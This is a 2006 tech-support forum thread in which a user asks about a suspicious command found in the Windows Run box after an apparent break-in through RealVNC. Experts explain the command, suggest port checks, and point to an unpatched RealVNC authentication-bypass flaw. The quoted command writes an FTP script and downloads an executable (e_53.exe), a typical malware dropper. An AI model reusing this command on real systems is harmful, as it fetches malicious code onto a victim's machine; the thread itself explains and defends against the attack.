Solved

Have I been hacked ?

Posted on 2006-11-02
6
1,347 Views
Last Modified: 2013-12-04
When I returned to my Windows XP PC after leaving the (password protected) RealVNC server running, I saw the Run... window had been opened and it contained the following string:
cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i &echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e

What does the above mean please ?
0
Comment
Question by:EugeneGardner
  • 3
  • 2
6 Comments
 
LVL 9

Accepted Solution

by:
FixingStuff earned 40 total points
ID: 17863044
Looks like there was a hack attempt. the command does the following:
Creates a file called i with the following contents:
open 127.0.0.1 31006
user 1 1
get e_53.exe
quit

Then it trys to run FTP using the above file as a script.

You are either wide open on the internet.... no firewall, or have port forwarding to VNC, which will get port scanned constantly.
Recommendation LOCK DOWN YOUR MACHINE ASAP.  At least change the default port on VNC.

Go here and run SheildsUP to check your open ports to the world.
www.grc.com

FS-
0
 
LVL 1

Author Comment

by:EugeneGardner
ID: 17865217
Thanks.  GRC thinks I am secure (as I am behind a firewall).  My port 31006 is in 'stealth' mode.
I'm not sure how the Run... command was caused to be issued as my Real VNS connection is password protected.  And where would the e_53.exe file be dropped ?  I can't find it anywhere.  Another thing I don't understand is what would the point of running a script like that be ?  There is no execute command !
0
 
LVL 9

Expert Comment

by:FixingStuff
ID: 17868447
Good that you are secure!
You probably should go back to GRC sheildsup and check port 5900.  Select the "lookup specific port information" button, enter 5900, then click the "Probe This Port" button. That is the default RealVNC port. I also suggest that you change the default to some other unique, unknown port. I don't know how they got past your password, but looks like they did somehow. Again, change the default port and you should probably change the password as well.
As far as what would be accomplished by the FTP script, I agree... it does not look like it would really do anything, especially if the e_53.exe does not exist on your system. It was probably just an attempt to prepare your machine to be a bot of some kind or allow it to be remotely controlled by a hacker.
FS-
0
U.S. Department of Agriculture and Acronis Access

With the new era of mobile computing, smartphones and tablets, wireless communications and cloud services, the USDA sought to take advantage of a mobilized workforce and the blurring lines between personal and corporate computing resources.

 
LVL 21

Assisted Solution

by:briancassin
briancassin earned 20 total points
ID: 17871591
this issue seems to be directly related to Real VNC

 how old is it ?

because their was a serious security flaw found back around May of this year if you have not updated it, it may be that attackers are getting into your system because you are running an unpatched version of VNC.

Source: eWeek

A "highly critical" flaw in RealVNC's virtual network computing software could allow malicious hackers to access a remote system without a password, according to a published advisory. RealVNC, the Cambridge, U.K.-based company that invented the open-source software, has acknowledged the flaw and posted patches for all affected versions. The RealVNC software, which competes with Symantec's pcAnywhere, allows users access a remote computer from a local PC. The company distributes the software in three versions—free, personal and enterprise edition. The vulnerability is caused due to an error within the handling of VNC password authentication requests. It can be exploited to bypass authentication and allows access to the remote system without requiring knowledge of the VNC password.
0
 
LVL 1

Author Comment

by:EugeneGardner
ID: 17872691
Ahh - good point.  I'm running version 4.1.1   I have just downloaded version 4.1.2
Thanks.
0
 
LVL 9

Expert Comment

by:FixingStuff
ID: 17874034
Good find! I'm on 4.1.1 also. Guess it's time for an update, however, I only use VNC via VPN... very secure that way.
FS-
0

Featured Post

Is Your Active Directory as Secure as You Think?

More than 75% of all records are compromised because of the loss or theft of a privileged credential. Experts have been exploring Active Directory infrastructure to identify key threats and establish best practices for keeping data safe. Attend this month’s webinar to learn more.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Article by: btan
The intent is not to repeat what many has know about Ransomware but more to join its dots of what is it, who are the victims, why it exists, when and how we respond on infection. Lastly, sum up in a glance to share such information with more to help…
Security measures require Windows be logged in using Standard User login (not Administrator).  Yet, sometimes an application has to be run “As Administrator” from a Standard User login.  This paper describes how to create a shortcut icon to launch a…
This tutorial demonstrates a quick way of adding group price to multiple Magento products.
Delivering innovative fully-managed cloud services for mission-critical applications requires expertise in multiple areas plus vision and commitment. Meet a few of the people behind the quality services of Concerto.

930 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

9 Experts available now in Live!

Get 1:1 Help Now